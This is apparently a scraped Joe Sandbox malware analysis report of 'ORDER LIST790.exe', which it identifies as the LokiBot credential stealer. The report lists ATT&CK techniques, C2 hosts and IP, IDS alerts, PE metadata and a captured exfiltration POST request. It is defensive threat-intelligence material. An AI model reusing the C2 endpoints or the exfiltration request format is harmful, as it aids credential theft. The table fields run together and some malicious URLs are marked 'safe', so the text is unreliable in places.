          Masquerading
          2
          OS Credential Dumping
          111
          Security Software Discovery
          Remote Services1
          Email Collection
          Exfiltration Over Other Network Medium1
          Encrypted Channel
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Disable or Modify Tools
          1
          Input Capture
          31
          Virtualization/Sandbox Evasion
          Remote Desktop Protocol1
          Input Capture
          Exfiltration Over Bluetooth1
          Non-Application Layer Protocol
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
          Virtualization/Sandbox Evasion
          1
          Credentials in Registry
          1
          Remote System Discovery
          SMB/Windows Admin Shares11
          Archive Collected Data
          Automated Exfiltration111
          Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
          Process Injection
          NTDS13
          System Information Discovery
          Distributed Component Object Model2
          Data from Local System
          Scheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information
          LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common2
          Obfuscated Files or Information
          Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items11
          Software Packing
          DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLinkDownload
          4.0.ORDER LIST790.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          0.2.ORDER LIST790.exe.470c248.8.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          0.2.ORDER LIST790.exe.4726268.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://philiphanson.org/medius/book/1.00%Avira URL Cloudsafe
          http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://alphastand.top/alien/fre.php0%URL Reputationsafe
          http://www.ibsensoftware.com/0%URL Reputationsafe
          http://philiphanson.org/medius/temp-transform0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://alphastand.win/alien/fre.php0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://alphastand.trade/alien/fre.php0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://66.29.145.162/?1122330%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          No contacted domains info
          NameMaliciousAntivirus DetectionReputation
          http://kbfvzoboss.bid/alien/fre.phptrue
          • URL Reputation: safe
          unknown
          http://alphastand.top/alien/fre.phptrue
          • URL Reputation: safe
          unknown
          http://alphastand.win/alien/fre.phptrue
          • URL Reputation: safe
          unknown
          http://alphastand.trade/alien/fre.phptrue
          • URL Reputation: safe
          unknown
          http://66.29.145.162/?112233true
          • Avira URL Cloud: safe
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://www.apache.org/licenses/LICENSE-2.0ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            http://www.fontbureau.comORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://www.fontbureau.com/designersGORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://apache.orgORDER LIST790.exe, 00000004.00000002.289238555.000000000356D000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://philiphanson.org/medius/book/1.0ORDER LIST790.exefalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.fontbureau.com/designers/?ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://www.founder.com.cn/cn/bTheORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.fontbureau.com/designers?ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://www.ibsensoftware.com/ORDER LIST790.exe, 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, ORDER LIST790.exe, 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, ORDER LIST790.exe, 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, ORDER LIST790.exe, 00000004.00000000.268461848.0000000000415000.00000040.00000400.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://philiphanson.org/medius/temp-transformORDER LIST790.exefalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.tiro.comORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.fontbureau.com/designersORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://www.goodfont.co.krORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.carterandcone.comlORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.centos.org/ORDER LIST790.exe, 00000004.00000002.289238555.000000000356D000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.sajatypeworks.comORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.typography.netDORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.fontbureau.com/designers/cabarga.htmlNORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.founder.com.cn/cn/cTheORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.galapagosdesign.com/staff/dennis.htmORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://fontfabrik.comORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.founder.com.cn/cnORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designers/frere-jones.htmlORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://httpd.apache.org/ORDER LIST790.exe, 00000004.00000002.289238555.000000000356D000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.jiyu-kobo.co.jp/ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.galapagosdesign.com/DPleaseORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.com/designers8ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.fonts.comORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.sandoll.co.krORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.urwpp.deDPleaseORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.zhongyicts.com.cnORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.sakkal.comORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://centos.orgORDER LIST790.exe, 00000004.00000002.289238555.000000000356D000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      66.29.145.162
                                      unknownUnited States
                                      19538ADVANTAGECOMUStrue
                                      Joe Sandbox Version:35.0.0 Citrine
                                      Analysis ID:682143
                                      Start date and time:2022-08-11 05:36:07 +02:00
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 6m 21s
                                      Hypervisor based Inspection enabled:false
                                      Report type:light
                                      Sample file name:ORDER LIST790.exe
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                      Number of analysed new started processes analysed:27
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.evad.winEXE@3/3@0/1
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HDC Information:Failed
                                      HCA Information:
                                      • Successful, ratio: 99%
                                      • Number of executed functions: 0
                                      • Number of non-executed functions: 0
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Adjust boot time
                                      • Enable AMSI
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                      • Excluded IPs from analysis (whitelisted): 23.211.6.115
                                      • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, fs.microsoft.com, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      TimeTypeDescription
                                      05:37:17API Interceptor2x Sleep call for process: ORDER LIST790.exe modified
                                      No context
                                      No context
                                      No context
                                      No context
                                      No context
                                      Process:C:\Users\user\Desktop\ORDER LIST790.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1308
                                      Entropy (8bit):5.345811588615766
                                      Encrypted:false
                                      SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84FsXE8:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzu
                                      MD5:2E016B886BDB8389D2DD0867BE55F87B
                                      SHA1:25D28EF2ACBB41764571E06E11BF4C05DD0E2F8B
                                      SHA-256:1D037CF00A8849E6866603297F85D3DABE09535E72EDD2636FB7D0F6C7DA3427
                                      SHA-512:C100729153954328AA2A77EECB2A3CBD03CB7E8E23D736000F890B17AAA50BA87745E30FB9E2B0D61E16DCA45694C79B4CE09B9F4475220BEB38CAEA546CFC2A
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                      Process:C:\Users\user\Desktop\ORDER LIST790.exe
                                      File Type:very short file (no magic)
                                      Category:dropped
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:1
                                      Process:C:\Users\user\Desktop\ORDER LIST790.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):46
                                      Entropy (8bit):1.0424600748477153
                                      Encrypted:false
                                      SSDEEP:3:/lbON:u
                                      MD5:89CA7E02D8B79ED50986F098D5686EC9
                                      SHA1:A602E0D4398F00C827BFCF711066E67718CA1377
                                      SHA-256:30AC626CBD4A97DB480A0379F6D2540195F594C967B7087A26566E352F24C794
                                      SHA-512:C5F453E32C0297E51BE43F84A7E63302E7D1E471FADF8BB789C22A4D6E03712D26E2B039D6FBDBD9EBD35C4E93EC27F03684A7BBB67C4FADCCE9F6279417B5DE
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:........................................user.
                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):7.176290841783126
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      • DOS Executable Generic (2002/1) 0.01%
                                      File name:ORDER LIST790.exe
                                      File size:872960
                                      MD5:80e4b72d26806ed5f245142166a48145
                                      SHA1:c07deb8c6fc551636d842c18d0540594afbe1c68
                                      SHA256:c5847da2de3c9aee81dc121287bb4c4c366d8c978f604cac6e19f80da1a46094
                                      SHA512:a520b295fb2cc2cccf94f0b6ad031d21680d39a4e906220982c43450a084d526beaafbac8cb4a2d01a97d8333c14c5bbcbb35f31e9b190112164e321d8c5b937
                                      SSDEEP:12288:4smY4vwHmQlBV8vpc++NxD9TP0gtp2Wftu4FnGV9nRUnlcsM2TgN/0s:/mY4vwHmQlBVapSXDuWFMVMlcmgi
                                      TLSH:9B058CEEAA98C45BCF604774F84944F42B66ACE1F021DDAF6893BC21F53239E515BD02
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....l.b..............0..>...........]... ...`....@.. ....................................@................................
                                      Icon Hash:00684068688eb200
                                      Entrypoint:0x4c5d86
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x62F46CA3 [Thu Aug 11 02:42:43 2022 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                      Instruction
                                      jmp dword ptr [00402000h]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xc5d340x4f.text
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xc60000x10ef4.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xd80000xc.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x20000xc3d8c0xc3e00False0.6307285019144863data7.320980599570163IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rsrc0xc60000x10ef40x11000False0.06841681985294118data4.12604928193498IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0xd80000xc0x200False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                      NameRVASizeTypeLanguageCountry
                                      RT_ICON0xc61000x10828data
                                      RT_GROUP_ICON0xd69380x14data
                                      RT_VERSION0xd695c0x398data
                                      RT_MANIFEST0xd6d040x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                      DLLImport
                                      mscoree.dll_CorExeMain
                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                      192.168.2.366.29.145.16249741802024317 08/11/22-05:37:23.228158TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24974180192.168.2.366.29.145.162
                                      192.168.2.366.29.145.16249743802024318 08/11/22-05:37:28.256446TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974380192.168.2.366.29.145.162
                                      192.168.2.366.29.145.16249742802024312 08/11/22-05:37:26.351786TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14974280192.168.2.366.29.145.162
                                      192.168.2.366.29.145.16249742802021641 08/11/22-05:37:26.351786TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974280192.168.2.366.29.145.162
                                      192.168.2.366.29.145.16249743802024313 08/11/22-05:37:28.256446TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974380192.168.2.366.29.145.162
                                      192.168.2.366.29.145.16249742802024317 08/11/22-05:37:26.351786TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24974280192.168.2.366.29.145.162
                                      192.168.2.366.29.145.16249741802024312 08/11/22-05:37:23.228158TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14974180192.168.2.366.29.145.162
                                      192.168.2.366.29.145.16249741802021641 08/11/22-05:37:23.228158TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974180192.168.2.366.29.145.162
                                      192.168.2.366.29.145.16249743802021641 08/11/22-05:37:28.256446TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974380192.168.2.366.29.145.162
                                      TimestampSource PortDest PortSource IPDest IP
                                      Aug 11, 2022 05:37:23.047916889 CEST4974180192.168.2.366.29.145.162
                                      Aug 11, 2022 05:37:23.214819908 CEST804974166.29.145.162192.168.2.3
                                      Aug 11, 2022 05:37:23.216342926 CEST4974180192.168.2.366.29.145.162
                                      Aug 11, 2022 05:37:23.228157997 CEST4974180192.168.2.366.29.145.162
                                      Aug 11, 2022 05:37:23.395914078 CEST804974166.29.145.162192.168.2.3
                                      Aug 11, 2022 05:37:23.396012068 CEST4974180192.168.2.366.29.145.162
                                      Aug 11, 2022 05:37:23.563275099 CEST804974166.29.145.162192.168.2.3
                                      Aug 11, 2022 05:37:24.124579906 CEST804974166.29.145.162192.168.2.3
                                      Aug 11, 2022 05:37:24.124609947 CEST804974166.29.145.162192.168.2.3
                                      Aug 11, 2022 05:37:24.124631882 CEST804974166.29.145.162192.168.2.3
                                      Aug 11, 2022 05:37:24.124653101 CEST804974166.29.145.162192.168.2.3
                                      Aug 11, 2022 05:37:24.124672890 CEST804974166.29.145.162192.168.2.3
                                      Aug 11, 2022 05:37:24.124700069 CEST4974180192.168.2.366.29.145.162
                                      Aug 11, 2022 05:37:24.124749899 CEST4974180192.168.2.366.29.145.162
                                      Aug 11, 2022 05:37:24.124942064 CEST4974180192.168.2.366.29.145.162
                                      Aug 11, 2022 05:37:26.179301023 CEST4974280192.168.2.366.29.145.162
                                      Aug 11, 2022 05:37:26.344233990 CEST804974266.29.145.162192.168.2.3
                                      Aug 11, 2022 05:37:26.344449043 CEST4974280192.168.2.366.29.145.162
                                      Aug 11, 2022 05:37:26.351785898 CEST4974280192.168.2.366.29.145.162
                                      Aug 11, 2022 05:37:26.516570091 CEST804974266.29.145.162192.168.2.3
                                      Aug 11, 2022 05:37:26.520668030 CEST4974280192.168.2.366.29.145.162
                                      Aug 11, 2022 05:37:26.685410023 CEST804974266.29.145.162192.168.2.3
                                      Aug 11, 2022 05:37:27.252741098 CEST804974266.29.145.162192.168.2.3
                                      Aug 11, 2022 05:37:27.252801895 CEST804974266.29.145.162192.168.2.3
                                      Aug 11, 2022 05:37:27.252851963 CEST804974266.29.145.162192.168.2.3
                                      Aug 11, 2022 05:37:27.252891064 CEST804974266.29.145.162192.168.2.3
                                      Aug 11, 2022 05:37:27.252917051 CEST804974266.29.145.162192.168.2.3
                                      Aug 11, 2022 05:37:27.253021002 CEST4974280192.168.2.366.29.145.162
                                      Aug 11, 2022 05:37:27.253202915 CEST4974280192.168.2.366.29.145.162
                                      Aug 11, 2022 05:37:27.253220081 CEST4974280192.168.2.366.29.145.162
                                      Aug 11, 2022 05:37:28.072700024 CEST4974380192.168.2.366.29.145.162
                                      Aug 11, 2022 05:37:28.240042925 CEST804974366.29.145.162192.168.2.3
                                      Aug 11, 2022 05:37:28.240178108 CEST4974380192.168.2.366.29.145.162
                                      Aug 11, 2022 05:37:28.256445885 CEST4974380192.168.2.366.29.145.162
                                      Aug 11, 2022 05:37:28.423341990 CEST804974366.29.145.162192.168.2.3
                                      Aug 11, 2022 05:37:28.423455954 CEST4974380192.168.2.366.29.145.162
                                      Aug 11, 2022 05:37:28.590348005 CEST804974366.29.145.162192.168.2.3
                                      Aug 11, 2022 05:37:29.144061089 CEST804974366.29.145.162192.168.2.3
                                      Aug 11, 2022 05:37:29.144119978 CEST804974366.29.145.162192.168.2.3
                                      Aug 11, 2022 05:37:29.144170046 CEST804974366.29.145.162192.168.2.3
                                      Aug 11, 2022 05:37:29.144268990 CEST4974380192.168.2.366.29.145.162
                                      Aug 11, 2022 05:37:29.144273043 CEST804974366.29.145.162192.168.2.3
                                      Aug 11, 2022 05:37:29.144311905 CEST804974366.29.145.162192.168.2.3
                                      Aug 11, 2022 05:37:29.144356966 CEST4974380192.168.2.366.29.145.162
                                      Aug 11, 2022 05:37:29.144377947 CEST4974380192.168.2.366.29.145.162
                                      Aug 11, 2022 05:37:29.144434929 CEST4974380192.168.2.366.29.145.162
                                      • 66.29.145.162
                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      0192.168.2.34974166.29.145.16280C:\Users\user\Desktop\ORDER LIST790.exe
                                      TimestampkBytes transferredDirectionData
                                      Aug 11, 2022 05:37:23.228157997 CEST1021OUTPOST /?112233 HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 66.29.145.162
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 6B020D42
                                      Content-Length: 190
                                      Connection: close
                                      Aug 11, 2022 05:37:24.124579906 CEST1023INHTTP/1.1 200 OK
